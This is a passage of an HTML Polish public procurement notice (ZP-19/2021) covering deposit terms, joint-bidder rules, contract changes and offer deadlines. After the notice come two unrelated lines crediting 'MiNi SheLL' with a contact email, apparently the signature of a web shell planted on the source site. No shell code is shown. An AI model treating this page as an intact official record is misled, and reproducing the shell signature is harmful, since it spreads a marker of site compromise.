<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich <br/>wartości (brutto), przedmiotu, dat wykonania i podmiotów, na rzecz których <br/>usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów <br/>określających, czy te usługi zostały wykonane lub są wykonywane należycie, <br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty <br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w <br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń <br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne <br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione <br/>w okresie ostatnich 3 miesięcy (załącznik nr 6 do SWZ ZP-19/2021);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 25.1. Zamawiający wymaga wniesienia wadium w wysokości: 300,00 zł<br/>25.2. Wadium należy wnieść przed upływem terminu składania ofert.<br/>25.3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>- pieniądzu,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2019 r. poz. 310,836,1572 z późn. zm.) 25.4. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy <br/>Zamawiającego w Banku Gospodarstwa Krajowego Oddział w Krakowie nr rachunku: <br/>46 1130 1150 0012 1252 7890 0001 z dopiskiem: „wadium na zabezpieczenie oferty w <br/>postępowaniu ZP-19/2021.”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie <br/>zostanie zaliczone na rachunku bankowym Zamawiającego. Dowód wniesienia <br/>wadium w formie innej niż pieniężnej należy załączyć do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.9.2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy <br/>ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia;<br/>11.9.3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania –<br/>wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do <br/>SWZ. W przypadku wspólnego ubiegania się o zamówienie przez <br/>Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z <br/>Wykonawców; 17.5. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie <br/>zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią <br/>Zamawiającemu umowę regulującą współpracę tych Wykonawców.19.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie <br/>ubiegających się o zamówienie. Przy ocenie spełniania warunków przez Wykonawców <br/>wspólnie składających ofertę Zamawiający przyjmie, że warunki udziału określone w <br/>pkt 19.1. powinni spełniać łącznie wszyscy Wykonawcy. Żaden z Wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z <br/>postępowania.<br/>19.4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/>zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te <br/>zdolności są wymagane. W takim przypadku, Wykonawcy wspólnie ubiegający się o <br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które <br/>usługi wykonają poszczególni Wykonawcy. 20.2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców <br/>oświadczenie o którym mowa w pkt 20.1.1) powyżej składa każdy z Wykonawców <br/>wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie <br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w <br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w <br/>postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 10<br/>Postanowienia końcowe<br/>1. Wszelkie zmiany w umowie wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający dopuszcza zmiany w przedmiocie zamówienia określonego w § 1, jeśli <br/>konieczność ich wprowadzenia wynika ze zmian w normach lub przepisach powszechnie <br/>obowiązujących - w zakresie koniecznego dostosowania się do norm lub przepisów. Nie <br/>wpływa to na zwiększenie wynagrodzenia Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-21 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com